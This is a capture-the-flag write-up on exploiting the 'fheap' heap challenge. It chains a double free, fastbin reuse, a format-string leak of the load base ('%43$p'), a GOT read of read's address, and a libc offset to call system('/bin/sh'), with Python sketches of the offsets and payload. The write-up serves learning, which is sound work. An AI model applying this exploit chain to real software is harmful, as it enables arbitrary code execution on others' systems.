0x00
Contents
Vulnerability principle
Double free
How to modify a function address before the second free
Fastbin characteristics
Modifying the function pointer
How to get the load base of the process
Format string vulnerability
Finding the offset of printf in the code segment
Using printf to output the desired address
How to get the address of the system function
Finding a function A that is called by the fheap process and lives in the same shared library as system
Getting the address of function A by reading its entry in .got.plt
Calculating the offset of system relative to function A from the information in the .dynsym section
Actual result
Summary
References
0x01
Vulnerability Principle
The program implements a small system for managing strings. When a string is deleted, the program checks whether the pointer stored at the given index is non-null to decide whether a string exists there, and frees it if so. However, the pointer is not cleared after the free, so the same entry can be freed twice, or any number of times (a double free).
Figure 1 The vulnerability trigger principle
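The flawed check can be illustrated with a toy model. This is only a sketch and not the real fheap code: the class `ToyStringTable`, its methods, and the block label are hypothetical names, and `None` stands in for a NULL pointer.

```python
# Toy model of the bug (not the real fheap code): a slot table whose
# delete() checks the pointer but never clears it after freeing.

class ToyStringTable:
    def __init__(self, slots=16):
        self.ptrs = [None] * slots   # None plays the role of a NULL pointer
        self.free_log = []           # every block handed to free(), in order

    def create(self, index, block):
        self.ptrs[index] = block

    def delete(self, index):
        # The only check: "is there a string at this index?"
        if self.ptrs[index] is None:
            return False
        self.free_log.append(self.ptrs[index])   # stands in for free(ptr)
        # BUG: self.ptrs[index] is not reset to None here.
        return True


table = ToyStringTable()
table.create(2, "str2_manage")
table.delete(2)
table.delete(2)   # accepted again: the stale pointer still looks valid
print(table.free_log)
```

Resetting the slot to `None` inside `delete()` would make the second call return `False`, which is the check the program was relying on.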
0x02
How to modify a function address before the second free
2.1 Fastbin characteristics
According to [Reference 1], fastbins hold small chunks in nine size classes, from 16 bytes to 80 bytes, one class per 8 bytes. The 0x20 (32) bytes that we request actually occupy 48 bytes, because each chunk also carries a 16-byte management area, so every chunk allocated for a 0x20-byte request ends up in the same fastbin list, referred to below as fastbin[5].
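The size arithmetic can be checked with a small calculation. The sketch below assumes a 64-bit glibc, where request sizes are rounded in the style of the `request2size` macro in malloc.c; the constants `SIZE_SZ`, `MINSIZE`, and `MAX_FAST` are assumed default values for that platform and are not taken from the article.

```python
# Sketch of glibc-style chunk size rounding, assuming a 64-bit target.
SIZE_SZ = 8                          # assumed sizeof(size_t) on x86-64
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1  # chunks are 16-byte aligned
MINSIZE = 32                         # assumed smallest possible chunk
MAX_FAST = 0x80                      # assumed default fastbin limit (chunk size)


def chunk_size(request):
    """Chunk size glibc would use for malloc(request) under these assumptions."""
    size = (request + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)


def served_by_fastbin(request):
    """True if a freed chunk of this request size would go to a fastbin."""
    return chunk_size(request) <= MAX_FAST


for request in (0x20, 0x80):
    print(hex(request), hex(chunk_size(request)), served_by_fastbin(request))
```

Under these assumptions a 0x20-byte request becomes a 48-byte (0x30) chunk that is small enough for a fastbin, while a 0x80-byte request becomes a 0x90-byte chunk that is not.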
2.2 Modifying the function pointer
1) Memory layout after creating four strings
Figure 2 Memory layout after creating four strings
The 8 blocks allocated on the heap are laid out sequentially from top to bottom. They do not look contiguous in the figure because each block is preceded by a 16-byte chunk management area that is not drawn.
2) Memory layout after deleting the four strings
Figure 3 Memory layout after deleting the four strings
When glibc frees memory whose size is between 16 and 80 bytes, it simply adds the block to a linked list in the fastbin array, so the blocks we freed can be found in the list represented by fastbin[5]. Fastbin lists are last in, first out, so the blocks belonging to str0, which were freed first, sit at the tail of the list, and the blocks belonging to str3, which were freed last, sit at the head. See Figure 3 for details.
3) How release_ptr is modified
After freeing the strings, we create a new string of size 0x80. Because str_manage is 0x20 bytes, the storage for its management structure is still taken from the fastbin, so the new str0_manage coincides with the original str3_manage. But because the characters need 0x80 bytes, the chunk that holds the data is not taken from the fastbin; it is allocated after the 8 blocks above. We then create another string: the new str1_manage coincides with the original str3 data block, and the new str1 data block coincides with the original str2_manage. Writing the contents of str1 therefore overwrites the original str2_manage structure. When we delete str2 again, the program still interprets the trailing 8 bytes of the structure that str2_info_ptr points to as a function pointer and calls it. If we write the address of the function we want to execute there, deleting str2 executes our function.
Figure 4 How release_ptr is modified
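The reuse order described above can be reproduced with a toy last-in, first-out free list. This is a sketch rather than glibc's allocator: `ToyHeap` and the block labels are hypothetical, and the order in which a delete frees its two blocks (data first, then the management structure) is an assumption chosen because it reproduces the overlap described in the text.

```python
# Toy LIFO free list that mimics how a single fastbin hands blocks back.

class ToyHeap:
    def __init__(self):
        self.fastbin = []   # the end of the list is the head of the fastbin

    def malloc(self, label, small=True):
        if small and self.fastbin:
            return self.fastbin.pop()   # reuse the most recently freed block
        return label                    # fresh block, named after its first owner

    def free(self, block):
        self.fastbin.append(block)      # freed block becomes the new head


heap = ToyHeap()
strings = []
for i in range(4):
    manage = heap.malloc(f"str{i}_manage")
    data = heap.malloc(f"str{i}_data")
    strings.append((manage, data))

for manage, data in strings:
    heap.free(data)     # assumed order: data block first...
    heap.free(manage)   # ...then the management structure

# New 0x80 string: management block from the fastbin, data block too big for it.
new_str0_manage = heap.malloc("new_str0_manage")
new_str0_data = heap.malloc("new_str0_data", small=False)
# Next small string: both blocks come from the fastbin.
new_str1_manage = heap.malloc("new_str1_manage")
new_str1_data = heap.malloc("new_str1_data")

print(new_str0_manage, new_str1_manage, new_str1_data)
```

In this model the data block of the second new string lands on the old str2_manage, which is why writing that string's contents rewrites the structure that a later delete of str2 will use.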
0x03
How to get the load base of a process
At this point we can already make the program execute a function of our choice. But what is the address of the function we want to execute? First, the value of release_ptr is the address of a function in the fheap program itself, that is, it lies in the code segment. Let's look at the memory map of the running process.
Figure 5 Memory map after fheap starts
As you can see, the heap has not been allocated yet, and libc is loaded at 0x7ffff7a0e000. But can we be sure that libc is loaded at the same address every time? No. So what information do we have? We have the program binary, so we know the offset of every instruction in the code segment relative to the process load base, and if we modify only the low byte of release_ptr, we can redirect execution to other instructions in the code segment without knowing the base.
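A partial overwrite can be sketched as follows. The helper `overwrite_low_bytes`, the two base addresses, and the offsets 0xD52 and 0xD2D are hypothetical values picked only for illustration; they are not taken from the fheap binary.

```python
import struct


def overwrite_low_bytes(pointer, new_low, nbytes):
    """Replace the lowest nbytes of a 64-bit little-endian pointer."""
    raw = bytearray(struct.pack("<Q", pointer))
    raw[:nbytes] = new_low.to_bytes(nbytes, "little")
    return struct.unpack("<Q", bytes(raw))[0]


ORIGINAL_OFFSET = 0xD52   # hypothetical offset of the original release function
TARGET_OFFSET = 0xD2D     # hypothetical offset of the instruction we want

results = []
for base in (0x555555554000, 0x7F12A3C00000):   # hypothetical load bases
    release_ptr = base + ORIGINAL_OFFSET
    redirected = overwrite_low_bytes(release_ptr, TARGET_OFFSET & 0xFF, 1)
    results.append(redirected - base)
    print(hex(release_ptr), "->", hex(redirected))
```

Because a load base is page aligned, the low 12 bits of a code address do not depend on it, so the same one-byte write reaches the same offset for any base.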
So where should we redirect the program to get something more useful? In other words, how can we obtain the program's load base for the later steps? The author of [Reference 2] uses a format string vulnerability to obtain it.
3.1 Format string vulnerability
[Reference 3] has a very detailed introduction, so I will not repeat it here and will only sketch the principle. When we use printf, we normally pass a format string and pass the data we want to print as additional arguments. But what if we pass only the format string and no arguments? See Figure 6.
Figure 6 Illustration of the format string vulnerability
What happens? printf interprets whatever data follows arg1 according to the format specifiers.
Here we only read data on the stack. For how to read data at an arbitrary address, see [Reference 3]; the principle is the same, but it is not needed for our example.
3.2 Finding the offset of printf in the code segment
Because position-independent code (PIC) is used, for functions such as printf that are implemented in a dynamic library outside the program, the compiler adds a local stub function in the PLT section, as described in [Reference 4]. So we need to find the local stub for printf. See Figure 7.
Figure 7 printf_plt
Writing 0x9d0 into the low two bytes of release_ptr redirects the program to printf_plt. This lets us read the data we want through printf.
3.3 Using printf to output the desired address
So how do we get the load base of the process? Recall that when control is passed to the release function, we are inside the delete function, and delete is called from main, so the stack must contain a return address into main. All we need to do is debug the program dynamically once and see where that return address is stored on the stack just before the release function is executed.
Figure 8 Stack contents before the release function is executed
We can see that the confirmation string "YES.AAAABBBBBBBBCCCCCCCC" that we entered before the deletion has been placed on the stack. What remains is to calculate the position of ret_main_addr on the stack. ret_main_addr is at 0x6f8 on the stack, and the top of the stack is at 0x5d0. How many parameters does that offset correspond to? (0x6f8-0x5d0)/8 = 37 parameters.
However, this is a 64-bit program, and under the calling convention the first six arguments are passed in six registers. So we add 6 to the total: 37+6=43.
So do we need to print 43 parameters to get the data we want? Fortunately, [Reference 3] introduces a way to print the value at a specified position: "%<position>$<format>". For example, to print the 43rd parameter as an address we can write "%43$p", which is very convenient.
In this way, we can get ret_main_addr.
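The index arithmetic above can be written out as a small helper. This is a sketch: the function name `positional_index` and its parameters are hypothetical, and it assumes 8-byte stack slots with six arguments passed in registers, as described in the text.

```python
def positional_index(slot_addr, stack_top, word=8, reg_args=6):
    """Position to use in %<n>$p for a value stored at slot_addr on the stack."""
    offset = slot_addr - stack_top
    if offset < 0 or offset % word:
        raise ValueError("slot must be word-aligned and above the stack top")
    return offset // word + reg_args


# Values read from the debugger in the text: slot at 0x6f8, stack top at 0x5d0.
index = positional_index(0x6F8, 0x5D0)
payload = "%{}$p".format(index)
print(index, payload)
```

If the stack layout differs in another build, only the two addresses passed to the helper need to be measured again.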
So how do we use this address? It lies inside the main function, and in IDA we can see that its offset from the start of the image is 0xCF2.
So the process load base is ret_main_addr - 0xCF2.
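As a sketch of this last step, the leaked text printed by "%43$p" can be parsed and turned into a base address. The leaked value in the example is hypothetical, and the helper name `load_base` is an illustration only; the offset 0xCF2 is the one given above.

```python
RET_MAIN_OFFSET = 0xCF2   # offset of the return address inside main (from IDA)


def load_base(leak_text):
    """Turn the text printed by %p (for example '0x...cf2') into the load base."""
    ret_main_addr = int(leak_text, 16)
    base = ret_main_addr - RET_MAIN_OFFSET
    if base & 0xFFF:
        raise ValueError("base is not page aligned; the leak is probably wrong")
    return base


base = load_base("0x555555554cf2")   # hypothetical leaked value
print(hex(base))
```

The page-alignment check is a cheap sanity test: a result that is not a multiple of 0x1000 usually means the wrong stack slot was printed.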
0x04
How to get the address of the system function
To open a shell we need the address of the system function, which lives in libc. But libc is not loaded at the same address on every run, so how do we get the address of a function in libc?
If we can obtain, through the process itself, the address of any variable or function in libc, we can work out the address of every other variable or function by looking at the libc symbol table.
4.1 Finding a function A that is called by the fheap process and lives in the same shared library as system
The read function is a reasonable choice: fheap calls it, and it lives in libc together with system. (I am still a learner here and am picking up these techniques as I go.)
4.2 Getting the address of function A by reading its entry in .got.plt
So how do we get the address of the read function? Position-independent code (PIC) makes this possible. PIC is implemented by the compiler adding a GOT table to the ELF file; see [Reference 4], which explains it well and includes examples. What is stored in the GOT? The addresses of the functions in dynamic libraries that the program calls. For read, it holds the actual address of the read function. So where is the entry for read in the GOT? Because read is a function, its entry is at some offset inside .got.plt. At load time, that entry is first filled with the address of the second instruction of the local stub read_plt, which is not the actual address of read in libc; the dynamic loader corrects it later, at the appropriate time (see [Reference 4] for what "appropriate" means). The relocation information must therefore contain the address of the .got.plt entry for read, so let's look at it. See Figure 9.
Figure 9 Relocation information for the read function
As you can see, the dynamic loader writes the actual address of read at offset 0x202058 from the process load base. Since we have the load base, we know the address of everything in the code segment and the data segment.
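The address of the GOT entry, and the decoding of the bytes read from it, can be sketched as follows. The load base and the leaked bytes in the example are hypothetical, and the helper names are illustrations only; the offset 0x202058 is the one shown in the relocation information.

```python
import struct

READ_GOT_OFFSET = 0x202058   # offset of read's .got.plt entry (from the text)


def read_got_slot(base):
    """Run-time address of the .got.plt entry that holds read's address."""
    return base + READ_GOT_OFFSET


def decode_pointer(raw):
    """Decode leaked little-endian bytes; leaks often omit the zero high bytes."""
    if len(raw) > 8:
        raise ValueError("a 64-bit pointer is at most 8 bytes")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


slot = read_got_slot(0x555555554000)                   # hypothetical load base
read_addr = decode_pointer(bytes.fromhex("7046b0f7ff7f"))  # hypothetical leak
print(hex(slot), hex(read_addr))
```

How the bytes at that address are actually leaked depends on the read primitive available; the sketch only covers the arithmetic before and after the leak.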
4.3 Calculating the address of system from the information in the .dynsym section
Now that we know the address of the read function, how do we get the address of the system function? The distance between read and system inside libc is fixed, so once we know that relative distance we know the address of system.
Every symbol that can be called by another program or library is recorded in the .dynsym section of the dynamic library, and its address is written as an offset from logical address 0, which makes it easy for the dynamic loader to fill in the GOT. Let's look at the .dynsym information for read and system.
Figure 10 Information for the read function in .dynsym
Figure 11 Information for the system function in .dynsym
From these two entries we can calculate that the offset of system relative to read is -0xb12e0.
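The calculation can be sketched in a few lines. The two .dynsym values and the run-time address of read below are hypothetical stand-ins, chosen so that their difference matches the -0xb12e0 stated above; the real values come from the figures and from the leak.

```python
# Hypothetical .dynsym values (offsets from logical address 0 in libc).
READ_SYM = 0xF6670
SYSTEM_SYM = 0x45390

SYSTEM_MINUS_READ = SYSTEM_SYM - READ_SYM   # offset of system relative to read


def system_address(read_addr):
    """Run-time address of system, given the run-time address of read."""
    return read_addr + SYSTEM_MINUS_READ


system_addr = system_address(0x7FFFF7B04670)   # hypothetical leaked read address
print(hex(SYSTEM_MINUS_READ & 0xFFFFFFFF), hex(system_addr))
```

The offset only holds for the exact libc build the symbol values were taken from, so it has to be recomputed for a different libc.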
0x05
Actual result
With the address of system, we overwrite the release function pointer by creating a string. Because the address of the string itself is passed to the release function as its argument, the created string can begin with "/bin/sh", which then serves as the argument that system uses to open the shell. When we delete str2 again, the system function is executed and a shell starts.
Figure 12 Successfully opening the shell
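One possible shape for the final string is sketched below. It assumes the function pointer occupies the last 8 bytes of a 0x20-byte structure (offset 0x18); that offset, the helper name `build_payload`, the padding byte, and the example address are assumptions and are not confirmed by the text. The ";" after "/bin/sh" is also an assumption, used so that the shell treats the padding as a separate command.

```python
import struct


def build_payload(system_addr, func_ptr_offset=0x18):
    """Command string, padding, then the address that replaces the function pointer."""
    command = b"/bin/sh;"   # assumed: ';' separates the command from the padding
    if len(command) > func_ptr_offset:
        raise ValueError("command does not fit before the function pointer")
    padding = b"A" * (func_ptr_offset - len(command))
    return command + padding + struct.pack("<Q", system_addr)


payload = build_payload(0x7FFFF7A53390)   # hypothetical address of system
print(len(payload), payload)
```

If the real structure stores the pointer at a different offset, only `func_ptr_offset` changes; the idea of "command first, pointer last" stays the same.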
0x06
Summary
It took me 15 hours to understand what the author of [Reference 2] was doing, which shows how large the gap between me and others still is. Until now I had only understood these mechanisms from the normal, forward-engineering side. Working through this problem not only put that theoretical knowledge to use, it also seemed to open the door to another way of thinking.
The topics involved are:
- Double free
- glibc memory management overview
- Format string vulnerability, printing the value at a specified position
- Dynamic relocation
- GDB debugging
0x07
References
[1] Introduction to glibc memory management:
https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/?spm=a313e.7916648.0.0.rJLhzh
[2] fheap exploit program:
http://bobao.360.cn/ctf/detail/179.html
[3] Format string vulnerability:
http://etutorials.org/Networking/network+security+assessment/Chapter+13.+Application-Level+Risks/13.7+Format+String+Bugs/
[4] "Deep Exploration of Linux Operating Systems: System Building and Principle Analysis", Wang Busheng
hctf2016 fheap Study (Solution of Flappypig team)